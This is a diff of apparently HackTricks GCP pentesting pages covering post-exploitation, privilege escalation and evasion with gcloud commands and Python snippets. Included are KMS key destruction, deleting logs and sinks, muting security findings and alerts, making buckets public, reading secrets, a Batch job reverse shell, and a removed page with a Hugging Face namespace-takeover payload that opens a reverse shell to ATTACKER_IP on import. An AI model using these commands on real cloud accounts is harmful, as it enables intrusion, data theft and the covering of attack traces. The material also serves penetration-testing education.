<summary>Mount Filestore filesystem</summary>
```bash
sudo apt-get update
sudo apt-get install nfs-common
@@ -24,6 +28,8 @@ mkdir /mnt/fs
sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs
```
</details>
To find the IP address of a filestore instance check the enumeration section of the page:
{{#ref}}
@@ -34,6 +40,10 @@ To find the IP address of a filestore insatnce check the enumeration section of
If the attacker isn't on an IP address with access over the share but has enough permissions to modify it, it's possible to remove the restrictions on access to it. It's also possible to grant more privileges to your IP address to have admin access over the share:
<details>
<summary>Update Filestore instance to allow access</summary>
```bash
gcloud filestore instances update nfstest \
--zone=<exact-zone> \
@@ -60,10 +70,16 @@ gcloud filestore instances update nfstest \
}
```
</details>
### Restore a backup
If there is a backup it's possible to **restore it** in an existing or in a new instance so its **information becomes accessible:**
<details>
<summary>Create new instance and restore backup</summary>
```bash
# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
@@ -82,10 +98,16 @@ gcloud filestore instances restore <new-instance-name> \
# Follow the previous section commands to mount it
```
</details>
### Create a backup and restore it
If you **don't have access over a share and don't want to modify it**, it's possible to **create a backup** of it and **restore** it as previously mentioned:
<details>
<summary>Create backup and restore in new instance</summary>
```bash
# Create share backup
gcloud filestore backups create <back-name> \
@@ -97,6 +119,8 @@ gcloud filestore backups create <back-name> \
# Follow the previous section commands to restore it and mount it
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -18,10 +18,16 @@ To **grant** the primitive role of **Owner** to a generic "@gmail.com" account,
You can use the following command to **grant a user the primitive role of Editor** to your existing project:
<details>
<summary>Grant Editor role to user</summary>
```bash
gcloud projects add-iam-policy-binding [PROJECT] --member user:[EMAIL] --role roles/editor
```
</details>
If you succeeded here, try **accessing the web interface** and exploring from there.
This is the **highest level you can assign using the gcloud tool**.
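To confirm the binding was applied, a quick check (project and email are placeholders):
<details>
<summary>Verify the granted role</summary>
```bash
gcloud projects get-iam-policy [PROJECT] \
  --flatten="bindings[].members" \
  --filter="bindings.members:user:[EMAIL]" \
  --format="table(bindings.role)"
```
</details>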

View File

@@ -14,6 +14,10 @@ Find basic information about KMS in:
An attacker with this permission could destroy a KMS version. In order to do this you first need to disable the key and then destroy it:
<details>
<summary>Disable and destroy key version (Python)</summary>
```python
# pip install google-cloud-kms
@@ -59,6 +63,8 @@ disable_key_version(project_id, location_id, key_ring_id, key_id, key_version)
destroy_key_version(project_id, location_id, key_ring_id, key_id, key_version)
```
</details>
### KMS Ransomware
In AWS it's possible to completely **steal a KMS key** by modifying the KMS resource policy and only allowing the attacker's account to use the key. As these resource policies don't exist in GCP, this is not possible.
@@ -78,6 +84,10 @@ gcloud kms import-jobs create [IMPORT_JOB] --location [LOCATION] --keyring [KEY_
#### Here are the steps to import a new version and disable/delete the older data:
<details>
<summary>Import new key version and delete old version</summary>
```bash
# Encrypt something with the original key
echo "This is a sample text to encrypt" > /tmp/my-plaintext-file.txt
@@ -152,8 +162,14 @@ gcloud kms keys versions destroy \
```
</details>
### `cloudkms.cryptoKeyVersions.useToEncrypt` | `cloudkms.cryptoKeyVersions.useToEncryptViaDelegation`
<details>
<summary>Encrypt data with symmetric key (Python)</summary>
```python
from google.cloud import kms
import base64
@@ -189,8 +205,14 @@ ciphertext = encrypt_symmetric(project_id, location_id, key_ring_id, key_id, pla
print('Ciphertext:', ciphertext)
```
</details>
### `cloudkms.cryptoKeyVersions.useToSign`
<details>
<summary>Sign message with asymmetric key (Python)</summary>
```python
import hashlib
from google.cloud import kms
@@ -225,8 +247,14 @@ signature = sign_asymmetric(project_id, location_id, key_ring_id, key_id, key_ve
print('Signature:', signature)
```
</details>
### `cloudkms.cryptoKeyVersions.useToVerify`
<details>
<summary>Verify signature with asymmetric key (Python)</summary>
```python
from google.cloud import kms
import hashlib
@@ -254,6 +282,8 @@ verified = verify_asymmetric_signature(project_id, location_id, key_ring_id, key
print('Verified:', verified)
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -26,6 +26,10 @@ In [https://console.cloud.google.com/iam-admin/audit/allservices](https://consol
### Read logs - `logging.logEntries.list`
<details>
<summary>Read log entries</summary>
```bash
# Read logs
gcloud logging read "logName=projects/your-project-id/logs/log-id" --limit=10 --format=json
@@ -36,79 +40,145 @@ gcloud logging read "timestamp >= \"2023-01-01T00:00:00Z\"" --limit=10 --format=
# Use these options to indicate a different bucket or view to use: --bucket=_Required --view=_Default
```
</details>
### `logging.logs.delete`
<details>
<summary>Delete log entries</summary>
```bash
# Delete all entries from a log in the _Default log bucket - logging.logs.delete
gcloud logging logs delete <log-name>
```
</details>
### Write logs - `logging.logEntries.create`
<details>
<summary>Write log entry</summary>
```bash
# Write a log entry to try to disrupt some system
gcloud logging write LOG_NAME "A deceptive log entry" --severity=ERROR
```
</details>
### `logging.buckets.update`
<details>
<summary>Update log bucket retention</summary>
```bash
# Set retention period to 1 day (_Required has a fixed one of 400days)
gcloud logging buckets update bucketlog --location=<location> --description="New description" --retention-days=1
```
</details>
### `logging.buckets.delete`
<details>
<summary>Delete log bucket</summary>
```bash
# Delete log bucket
gcloud logging buckets delete BUCKET_NAME --location=<location>
```
</details>
### `logging.links.delete`
<details>
<summary>Delete log link</summary>
```bash
# Delete link
gcloud logging links delete <link-id> --bucket <bucket> --location <location>
```
</details>
### `logging.views.delete`
<details>
<summary>Delete logging view</summary>
```bash
# Delete a logging view to remove access to anyone using it
gcloud logging views delete <view-id> --bucket=<bucket> --location=global
```
</details>
### `logging.views.update`
<details>
<summary>Update logging view to hide data</summary>
```bash
# Update a logging view to hide data
gcloud logging views update <view-id> --log-filter="resource.type=gce_instance" --bucket=<bucket> --location=global --description="New description for the log view"
```
</details>
### `logging.logMetrics.update`
<details>
<summary>Update log-based metrics</summary>
```bash
# Update log based metrics - logging.logMetrics.update
gcloud logging metrics update <metric-name> --description="Changed metric description" --log-filter="severity>CRITICAL" --project=PROJECT_ID
```
</details>
### `logging.logMetrics.delete`
<details>
<summary>Delete log-based metrics</summary>
```bash
# Delete log based metrics - logging.logMetrics.delete
gcloud logging metrics delete <metric-name>
```
</details>
### `logging.sinks.delete`
<details>
<summary>Delete log sink</summary>
```bash
# Delete sink - logging.sinks.delete
gcloud logging sinks delete <sink-name>
```
</details>
### `logging.sinks.update`
<details>
<summary>Update/disrupt log sink</summary>
```bash
# Disable sink - logging.sinks.update
gcloud logging sinks update <sink-name> --disabled
@@ -130,6 +200,8 @@ gcloud logging sinks update SINK_NAME --use-partitioned-tables
gcloud logging sinks update SINK_NAME --no-use-partitioned-tables
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -20,14 +20,24 @@ gcp-logging-post-exploitation.md
Delete an alert policy:
<details>
<summary>Delete alert policy</summary>
```bash
gcloud alpha monitoring policies delete <policy>
```
</details>
### `monitoring.alertPolicies.update`
Disrupt an alert policy:
<details>
<summary>Disrupt alert policy</summary>
```bash
# Disable policy
gcloud alpha monitoring policies update <alert-policy> --no-enabled
@@ -43,10 +53,16 @@ gcloud alpha monitoring policies update <alert-policy> --policy="{ 'displayName'
# or use --policy-from-file <policy-file>
```
</details>
### `monitoring.dashboards.update`
Modify a dashboard to disrupt it:
<details>
<summary>Disrupt dashboard</summary>
```bash
# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
@@ -59,19 +75,31 @@ gcloud monitoring dashboards update <dashboard> --config='''
'''
```
</details>
### `monitoring.dashboards.delete`
Delete a dashboard:
<details>
<summary>Delete dashboard</summary>
```bash
# Delete dashboard
gcloud monitoring dashboards delete <dashboard>
```
</details>
### `monitoring.snoozes.create`
Prevent policies from generating alerts by creating a snoozer:
<details>
<summary>Create snoozer to stop alerts</summary>
```bash
# Stop alerts by creating a snoozer
gcloud monitoring snoozes create --display-name="Maintenance Week" \
@@ -80,10 +108,16 @@ gcloud monitoring snoozes create --display-name="Maintenance Week" \
--end-time="2023-03-07T23:59:59.5-0500"
```
</details>
### `monitoring.snoozes.update`
Update the timing of a snooze to prevent alerts from being created during the window the attacker is interested in:
<details>
<summary>Update snoozer timing</summary>
```bash
# Modify the timing of a snooze
gcloud monitoring snoozes update <snooze> --start-time=START_TIME --end-time=END_TIME
@@ -92,25 +126,39 @@ gcloud monitoring snoozes update <snooze> --start-time=START_TIME --end-time=END
gcloud monitoring snoozes update <snooze> --snooze-from-file=<file>
```
</details>
### `monitoring.notificationChannels.delete`
Delete a configured channel:
<details>
<summary>Delete notification channel</summary>
```bash
# Delete channel
gcloud alpha monitoring channels delete <channel>
```
</details>
### `monitoring.notificationChannels.update`
Update labels of a channel to disrupt it:
<details>
<summary>Update notification channel labels</summary>
```bash
# Delete or update labels, for example email channels have the email indicated here
gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels
gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,28 +14,46 @@ For more information about Pub/Sub check the following page:
Publish a message in a topic, useful to **send unexpected data** and trigger unexpected functionalities or exploit vulnerabilities:
<details>
<summary>Publish message to topic</summary>
```bash
# Publish a message in a topic
gcloud pubsub topics publish <topic_name> --message "Hello!"
```
</details>
### `pubsub.topics.detachSubscription`
Useful to prevent a subscription from receiving messages, maybe to avoid detection.
<details>
<summary>Detach subscription from topic</summary>
```bash
gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>
```
</details>
### `pubsub.topics.delete`
Useful to prevent a subscription from receiving messages, maybe to avoid detection.\
It's possible to delete a topic even with subscriptions attached to it.
<details>
<summary>Delete topic</summary>
```bash
gcloud pubsub topics delete <TOPIC NAME>
```
</details>
### `pubsub.topics.update`
Use this permission to update some setting of the topic to disrupt it, like `--clear-schema-settings`, `--message-retention-duration`, `--message-storage-policy-allowed-regions`, `--schema`, `--schema-project`, `--topic-encryption-key`...
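For example, a sketch that shrinks message retention to the minimum and strips schema validation (the flags are the ones listed above; the topic name is a placeholder):
<details>
<summary>Disrupt topic settings</summary>
```bash
gcloud pubsub topics update <topic-name> \
  --message-retention-duration=10m --clear-schema-settings
```
</details>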
@@ -48,13 +66,23 @@ Give yourself permission to perform any of the previous attacks.
Get all the messages in a web server:
<details>
<summary>Create push subscription to receive messages</summary>
```bash
# Create a push subscription and receive all the messages instantly in your web server
gcloud pubsub subscriptions create <subscription name> --topic <topic name> --push-endpoint https://<URL to push to>
```
</details>
Create a subscription and use it to **pull messages**:
<details>
<summary>Create pull subscription and retrieve messages</summary>
```bash
# This will retrieve a non-ACKed message (and won't ACK it)
gcloud pubsub subscriptions create <subscription name> --topic <topic_name>
@@ -64,22 +92,36 @@ gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
## This command will wait for a message to be posted
```
</details>
### `pubsub.subscriptions.delete`
**Deleting a subscription** could be useful to disrupt a log processing system or something similar:
<details>
<summary>Delete subscription</summary>
```bash
gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>
```
</details>
### `pubsub.subscriptions.update`
Use this permission to update some setting so messages are stored in a place you can access (URL, Big Query table, Bucket) or just to disrupt it.
<details>
<summary>Update subscription endpoint</summary>
```bash
gcloud pubsub subscriptions update --push-endpoint <your URL> <subscription-name>
```
</details>
### `pubsub.subscriptions.setIamPolicy`
Give yourself the permissions needed to perform any of the previously commented attacks.
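A minimal sketch of granting yourself an admin role over the subscription (the member and subscription name are placeholders):
<details>
<summary>Grant yourself permissions on the subscription</summary>
```bash
gcloud pubsub subscriptions add-iam-policy-binding <subscription-name> \
  --member="user:attacker@example.com" --role="roles/pubsub.admin"
```
</details>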
@@ -89,6 +131,10 @@ Give yourself the permissions needed to perform any of the previously commented
Attach a schema to a topic so the messages don't fulfil it and therefore the topic is disrupted.\
If there aren't any schemas you might need to create one.
<details>
<summary>Create schema file and attach to topic</summary>
```json:schema.json
{
"namespace": "com.example",
@@ -114,14 +160,22 @@ gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
--message-encoding=json
```
</details>
### `pubsub.schemas.delete`
It might look like by deleting a schema you will be able to send messages that don't comply with the schema. However, as the schema will be deleted, no message will actually enter the topic. So this is **USELESS**:
<details>
<summary>Delete schema (not useful)</summary>
```bash
gcloud pubsub schemas delete <SCHEMA NAME>
```
</details>
### `pubsub.schemas.setIamPolicy`
Give yourself the permissions needed to perform any of the previously commented attacks.
@@ -130,6 +184,10 @@ Give yourself the permissions needed to perform any of the previously commented
This will create a snapshot of all the unACKed messages and put them back into the subscription. Not very useful for an attacker, but here it is:
<details>
<summary>Create snapshot and seek to it</summary>
```bash
gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \
--subscription=YOUR_SUBSCRIPTION_NAME
@@ -137,6 +195,8 @@ gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
--snapshot=YOUR_SNAPSHOT_NAME
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,11 +14,17 @@ For more information about Secret Manager check:
This gives you access to read the secrets from Secret Manager and maybe this could help to escalate privileges (depending on which information is stored inside the secret):
<details>
<summary>Access secret version</summary>
```bash
# Get clear-text of version 1 of secret: "<secret name>"
gcloud secrets versions access 1 --secret="<secret_name>"
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,47 +14,77 @@ For more information check:
Prevent generation of findings that could detect an attacker by creating a `muteconfig`:
<details>
<summary>Create Muteconfig</summary>
```bash
# Create Muteconfig
gcloud scc muteconfigs create my-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""
```
</details>
### `securitycenter.muteconfigs.update`
Prevent generation of findings that could detect an attacker by updating a `muteconfig`:
<details>
<summary>Update Muteconfig</summary>
```bash
# Update Muteconfig
gcloud scc muteconfigs update my-test-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""
```
</details>
### `securitycenter.findings.bulkMuteUpdate`
Mute findings based on a filter:
<details>
<summary>Bulk mute based on filter</summary>
```bash
# Mute based on a filter
gcloud scc findings bulk-mute --organization=929851756715 --filter="category=\"XSS_SCRIPTING\""
```
</details>
A muted finding won't appear in the SCC dashboard and reports.
### `securitycenter.findings.setMute`
Mute specific findings based on their source, finding ID, etc.:
<details>
<summary>Set finding as muted</summary>
```bash
gcloud scc findings set-mute 789 --organization=organizations/123 --source=456 --mute=MUTED
```
</details>
### `securitycenter.findings.update`
Update a finding to indicate erroneous information:
<details>
<summary>Update finding state</summary>
```bash
gcloud scc findings update `myFinding` --organization=123456 --source=5678 --state=INACTIVE
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,6 +14,10 @@ For more information about CLoud Storage check this page:
It's possible to give external users (logged in to GCP or not) access to bucket content. However, by default, buckets have the option to be exposed publicly disabled:
<details>
<summary>Make bucket/objects public</summary>
```bash
# Disable public prevention
gcloud storage buckets update gs://BUCKET_NAME --no-public-access-prevention
@@ -27,6 +31,8 @@ gcloud storage buckets update gs://BUCKET_NAME --add-acl-grant=entity=AllUsers,r
gcloud storage objects update gs://BUCKET_NAME/OBJECT_NAME --add-acl-grant=entity=AllUsers,role=READER
```
</details>
If you try to give **ACLs to a bucket with disabled ACLs** you will find this error: `ERROR: HTTPError 400: Cannot use ACL API to update bucket policy when uniform bucket-level access is enabled. Read more at https://cloud.google.com/storage/docs/uniform-bucket-level-access`
To access open buckets via browser, access the URL `https://<bucket_name>.storage.googleapis.com/` or `https://<bucket_name>.storage.googleapis.com/<object_name>`
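The same check can be done from the CLI without credentials, e.g. (bucket and object names are placeholders):
<details>
<summary>Access public bucket unauthenticated</summary>
```bash
# List the objects of a public bucket (XML listing)
curl "https://<bucket_name>.storage.googleapis.com/"
# Download a specific object
curl -O "https://<bucket_name>.storage.googleapis.com/<object_name>"
```
</details>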

View File

@@ -1,123 +0,0 @@
# GCP - Vertex AI Post-Exploitation via Hugging Face Model Namespace Reuse
{{#include ../../../banners/hacktricks-training.md}}
## Scenario
- Vertex AI Model Garden allows direct deployment of many Hugging Face (HF) models.
- HF model identifiers are Author/ModelName. If an author/org on HF is deleted, the same author name can be re-registered by anyone. Attackers can then create a repo with the same ModelName at the legacy path.
- Pipelines, SDKs, or cloud catalogs that fetch by name only (no pinning/integrity) will pull the attacker-controlled repo. When the model is deployed, loader code from that repo can execute inside the Vertex AI endpoint container, yielding RCE with the endpoint's permissions.
Two common takeover cases on HF:
- Ownership deletion: Old path 404 until someone re-registers the author and publishes the same ModelName.
- Ownership transfer: HF issues 307 redirects from old Author/ModelName to the new author. If the old author is later deleted and re-registered by an attacker, the redirect chain is broken and the attacker's repo serves at the legacy path.
## Identifying Reusable Namespaces (HF)
- Old author deleted: the page for the author returns 404; model path may return 404 until takeover.
- Transferred models: the old model path issues 307 to the new owner while the old author exists. If the old author is later deleted and re-registered, the legacy path will resolve to the attackers repo.
Quick checks with curl:
```bash
# Check author/org existence
curl -I https://huggingface.co/<Author>
# 200 = exists, 404 = deleted/available
# Check old model path behavior
curl -I https://huggingface.co/<Author>/<ModelName>
# 307 = redirect to new owner (transfer case)
# 404 = missing (deletion case) until someone re-registers
```
## End-to-end Attack Flow against Vertex AI
1) Discover reusable model namespaces that Model Garden lists as deployable:
- Find HF models in Vertex AI Model Garden that still show as “verified deployable”.
- Verify on HF if the original author is deleted or if the model was transferred and the old author was later removed.
2) Re-register the deleted author on HF and recreate the same ModelName.
3) Publish a malicious repo. Include code that executes on model load. Examples that commonly execute during HF model load:
- Side effects in __init__.py of the repo
- Custom modeling_*.py or processing code referenced by config/auto_map
- Code paths that require trust_remote_code=True in Transformers pipelines
4) A Vertex AI deployment of the legacy Author/ModelName now pulls the attacker repo. The loader executes inside the Vertex AI endpoint container.
5) Payload establishes access from the endpoint environment (RCE) with the endpoints permissions.
Example payload fragment executed on import (for demonstration only):
```python
# Place in __init__.py or a module imported by the model loader
import os, socket, subprocess, threading
def _rs(host, port):
s = socket.socket(); s.connect((host, port))
for fd in (0,1,2):
try:
os.dup2(s.fileno(), fd)
except Exception:
pass
subprocess.call(["/bin/sh","-i"]) # Or python -c exec ...
if os.environ.get("VTX_AI","1") == "1":
threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start()
```
Notes
- Real-world loaders vary. Many Vertex AI HF integrations clone and import repo modules referenced by the models config (e.g., auto_map), which can trigger code execution. Some uses require trust_remote_code=True.
- The endpoint typically runs in a dedicated container with limited scope, but it is a valid initial foothold for data access and lateral movement in GCP.
## Post-Exploitation Tips (Vertex AI Endpoint)
Once code is running inside the endpoint container, consider:
- Enumerating environment variables and metadata for credentials/tokens
- Accessing attached storage or mounted model artifacts
- Interacting with Google APIs via service account identity (Document AI, Storage, Pub/Sub, etc.)
- Persistence in the model artifact if the platform re-pulls the repo
Enumerate instance metadata if accessible (container dependent):
```bash
curl -H "Metadata-Flavor: Google" \
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```
## Defensive Guidance for Vertex AI Users
- Pin models by commit in HF loaders to prevent silent replacement:
```python
from transformers import AutoModel
m = AutoModel.from_pretrained("Author/ModelName", revision="<COMMIT_HASH>")
```
- Mirror vetted HF models into a trusted internal artifact store/registry and deploy from there.
- Continuously scan codebases and configs for hard-coded Author/ModelName that are deleted/transferred; update to new namespaces or pin by commit.
- In Model Garden, verify model provenance and author existence before deployment.
## Recognition Heuristics (HTTP)
- Deleted author: author page 404; legacy model path 404 until takeover.
- Transferred model: legacy path 307 to new author while old author exists; if old author later deleted and re-registered, legacy path serves attacker content.
```bash
curl -I https://huggingface.co/<OldAuthor>/<ModelName> | egrep "^HTTP|^location"
```
## Cross-References
- See broader methodology and supply-chain notes:
{{#ref}}
../../pentesting-cloud-methodology.md
{{#endref}}
## References
- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/)
- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo)
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -28,12 +28,15 @@ As you might not know which APIs are enabled in the project or the restrictions
This permission allows you to **create an API key**:
<details>
<summary>Create an API key using gcloud</summary>
```bash
gcloud services api-keys create
Operation [operations/akmf.p7-[...]9] complete. Result: {
"@type":"type.googleapis.com/google.api.apikeys.v2.Key",
"createTime":"2022-01-26T12:23:06.281029Z",
"etag":"W/\"HOhA[...]==\"",
"etag":"W/\"HOhA[...]=\"",
"keyString":"AIzaSy[...]oU",
"name":"projects/5[...]6/locations/global/keys/f707[...]e8",
"uid":"f707[...]e8",
@@ -41,6 +44,8 @@ Operation [operations/akmf.p7-[...]9] complete. Result: {
}
```
</details>
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/b-apikeys.keys.create.sh).
> [!CAUTION]
@@ -50,23 +55,33 @@ You can find a script to automate the [**creation, exploit and cleaning of a vul
These permissions allow you to **list and get all the API keys and retrieve the key string**:
<details>
<summary>List and retrieve all API keys</summary>
```bash
for key in $(gcloud services api-keys list --uri); do
gcloud services api-keys get-key-string "$key"
done
```
</details>
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh).
### `apikeys.keys.undelete` , `apikeys.keys.list` <a href="#serviceusage.apikeys.regenerateapikeys.keys.list" id="serviceusage.apikeys.regenerateapikeys.keys.list"></a>
These permissions allow you to **list and regenerate deleted API keys**. The **API key string is given in the output** once the **undelete** completes:
<details>
<summary>List and undelete API keys</summary>
```bash
gcloud services api-keys list --show-deleted
gcloud services api-keys undelete <key-uid>
```
</details>
### Create Internal OAuth Application to phish other workers
Check the following page to learn how to do this, although this action belongs to the service **`clientauthconfig`** [according to the docs](https://cloud.google.com/iap/docs/programmatic-oauth-clients#before-you-begin):

View File

@@ -19,11 +19,16 @@ You can find python code examples in [https://github.com/GoogleCloudPlatform/pyt
By default, the name of the App service is going to be **`default`**, and there can be only 1 instance with the same name.\
To change it and create a second App, in **`app.yaml`**, change the value of the root key to something like **`service: my-second-app`**
<details>
<summary>Deploy App Engine application</summary>
```bash
cd python-docs-samples/appengine/flexible/hello_world
gcloud app deploy #Upload and start application inside the folder
```
</details>
Give it at least 10-15 minutes; if it doesn't work, run the **deploy a couple more times** and wait a few more minutes.
> [!NOTE]
@@ -35,6 +40,9 @@ The URL of the application is something like `https://<proj-name>.oa.r.appspot.c
You might have enough permissions to update an AppEngine but not to create a new one. In that case this is how you could update the current App Engine:
<details>
<summary>Update existing App Engine application</summary>
```bash
# Find the code of the App Engine in the buckets
gsutil ls
@@ -66,28 +74,45 @@ gcloud app deploy
gcloud app update --service-account=<sa>@$PROJECT_ID.iam.gserviceaccount.com
```
</details>
If you have **already compromised an App Engine** and you have the permission **`appengine.applications.update`** and **actAs** over the service account to use, you could modify the service account used by AppEngine with:
<details>
<summary>Update App Engine service account</summary>
```bash
gcloud app update --service-account=<sa>@$PROJECT_ID.iam.gserviceaccount.com
```
</details>
### `appengine.instances.enableDebug`, `appengine.instances.get`, `appengine.instances.list`, `appengine.operations.get`, `appengine.services.get`, `appengine.services.list`, `appengine.versions.get`, `appengine.versions.list`, `compute.projects.get`
With these permissions, it's possible to **log in via SSH to App Engine instances** of type **flexible** (not standard). Some of the **`list`** and **`get`** permissions **might not actually be needed**.
<details>
<summary>SSH into App Engine instance</summary>
```bash
gcloud app instances ssh --service <app-name> --version <version-id> <ID>
```
</details>
### `appengine.applications.update`, `appengine.operations.get`
I think this just changes the background SA Google will use to set up the applications, so I don't think you can abuse this to steal the service account.
<details>
<summary>Update application service account</summary>
```bash
gcloud app update --service-account=<sa_email>
```
</details>
### `appengine.versions.getFileContents`, `appengine.versions.update`
Not sure how to abuse these permissions or whether they are useful (note that when you change the code a new version is created, so it's unclear whether you can just update the code or the IAM role of an existing one, although you might be able to by changing the code inside the bucket).

View File

@@ -14,6 +14,9 @@ For more information about Artifact Registry check:
With this permission an attacker could upload new versions of the artifacts with malicious code like Docker images:
<details>
<summary>Upload Docker image to Artifact Registry</summary>
```bash
# Configure docker to use gcloud to authenticate with Artifact Registry
gcloud auth configure-docker <location>-docker.pkg.dev
@@ -25,6 +28,8 @@ docker tag <local-img-name>:<local-tag> <location>-docker.pkg.dev/<proj-name>/<r
docker push <location>-docker.pkg.dev/<proj-name>/<repo-name>/<img-name>:<tag>
```
</details>
> [!CAUTION]
> It was checked that it's **possible to upload a new malicious docker** image with the same name and tag as the one already present, so the **old one will lose the tag** and next time that image with that tag is **downloaded the malicious one** will be downloaded.
@@ -40,6 +45,9 @@ docker push <location>-docker.pkg.dev/<proj-name>/<repo-name>/<img-name>:<tag>
- Inside this directory, create another directory with your package name, e.g., `hello_world`.
- Inside your package directory, create an `__init__.py` file. This file can be empty or can contain initializations for your package.
<details>
<summary>Create project structure</summary>
```bash
mkdir hello_world_library
cd hello_world_library
@@ -47,22 +55,32 @@ docker push <location>-docker.pkg.dev/<proj-name>/<repo-name>/<img-name>:<tag>
touch hello_world/__init__.py
```
</details>
2. **Write your library code**:
- Inside the `hello_world` directory, create a new Python file for your module, e.g., `greet.py`.
- Write your "Hello, World!" function:
<details>
<summary>Create library module</summary>
```python
# hello_world/greet.py
def say_hello():
return "Hello, World!"
```
</details>
3. **Create a `setup.py` file**:
- In the root of your `hello_world_library` directory, create a `setup.py` file.
- This file contains metadata about your library and tells Python how to install it.
<details>
<summary>Create setup.py file</summary>
```python
# setup.py
from setuptools import setup, find_packages
@@ -77,40 +95,60 @@ docker push <location>-docker.pkg.dev/<proj-name>/<repo-name>/<img-name>:<tag>
)
```
</details>
**Now, let's upload the library:**
1. **Build your package**:
- From the root of your `hello_world_library` directory, run:
<details>
<summary>Build Python package</summary>
```sh
python3 setup.py sdist bdist_wheel
```
</details>
2. **Configure authentication for twine** (used to upload your package):
- Ensure you have `twine` installed (`pip install twine`).
- Use `gcloud` to configure credentials:
<details>
<summary>Upload package with twine</summary>
```sh
twine upload --username 'oauth2accesstoken' --password "$(gcloud auth print-access-token)" --repository-url https://<location>-python.pkg.dev/<project-id>/<repo-name>/ dist/*
```
</details>
3. **Clean the build**
<details>
<summary>Clean build artifacts</summary>
```bash
rm -rf dist build hello_world.egg-info
```
</details>
</details>
> [!CAUTION]
> It's not possible to upload a python library with the same version as the one already present, but it's possible to upload **greater versions** (or add an extra **`.0` at the end** of the version if that works - not in python though), or to **delete the last version and upload a new one** (requires `artifactregistry.versions.delete`)**:**
>
> <details>
> <summary>Delete artifact version</summary>
>
> ```sh
> gcloud artifacts versions delete <version> --repository=<repo-name> --location=<location> --package=<lib-name>
> ```
>
> </details>
### `artifactregistry.repositories.downloadArtifacts`
@@ -118,6 +156,9 @@ With this permission you can **download artifacts** and search for **sensitive i
Download a **Docker** image:
<details>
<summary>Download Docker image from Artifact Registry</summary>
```sh
# Configure docker to use gcloud to authenticate with Artifact Registry
gcloud auth configure-docker <location>-docker.pkg.dev
@@ -126,12 +167,19 @@ gcloud auth configure-docker <location>-docker.pkg.dev
docker pull <location>-docker.pkg.dev/<proj-name>/<repo-name>/<img-name>:<tag>
```
</details>
Download a **python** library:
<details>
<summary>Download Python library from Artifact Registry</summary>
```bash
pip install <lib-name> --index-url "https://oauth2accesstoken:$(gcloud auth print-access-token)@<location>-python.pkg.dev/<project-id>/<repo-name>/simple/" --trusted-host <location>-python.pkg.dev --no-cache-dir
```
</details>
- What happens if a remote and a standard registry are mixed in a virtual one and a package exists in both? Check this page:
{{#ref}}
@@ -142,19 +190,29 @@ pip install <lib-name> --index-url "https://oauth2accesstoken:$(gcloud auth prin
Delete artifacts from the registry, like docker images:
<details>
<summary>Delete Docker image from Artifact Registry</summary>
```bash
# Delete a docker image
gcloud artifacts docker images delete <location>-docker.pkg.dev/<proj-name>/<repo-name>/<img-name>:<tag>
```
</details>
### `artifactregistry.repositories.delete`
Delete a full repository (even if it has content):
<details>
<summary>Delete Artifact Registry repository</summary>
```
gcloud artifacts repositories delete <repo-name> --location=<location>
```
</details>
### `artifactregistry.repositories.setIamPolicy`
An attacker with this permission could give himself permissions to perform some of the previously mentioned repository attacks.

View File

@@ -14,6 +14,9 @@ Basic information:
It's possible to create a batch job, get a reverse shell and exfiltrate the metadata token of the SA (compute SA by default).
<details>
<summary>Create Batch job with reverse shell</summary>
```bash
gcloud beta batch jobs submit job-lxo3b2ub --location us-east1 --config - <<EOD
{
@@ -55,6 +58,8 @@ gcloud beta batch jobs submit job-lxo3b2ub --location us-east1 --config - <<EOD
EOD
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,24 +14,37 @@ For more information about BigQuery check:
Reading the information stored inside a BigQuery table, it might be possible to find **sensitive information**. To access the info, the permissions needed are **`bigquery.tables.get`**, **`bigquery.jobs.create`** and **`bigquery.tables.getData`**:
<details>
<summary>Read BigQuery table data</summary>
```bash
bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'
```
</details>
### Export data
This is another way to access the data. **Export it to a cloud storage bucket** and then **download the files** with the information.\
To perform this action the following permissions are needed: **`bigquery.tables.export`**, **`bigquery.jobs.create`** and **`storage.objects.create`**.
<details>
<summary>Export BigQuery table to Cloud Storage</summary>
```bash
bq extract <dataset>.<table> "gs://<bucket>/table*.csv"
```
</details>
### Insert data
It might be possible to **introduce certain trusted data** in a Bigquery table to abuse a **vulnerability in some other place.** This can be easily done with the permissions **`bigquery.tables.get`** , **`bigquery.tables.updateData`** and **`bigquery.jobs.create`**:
<details>
<summary>Insert data into BigQuery table</summary>
```bash
# Via query
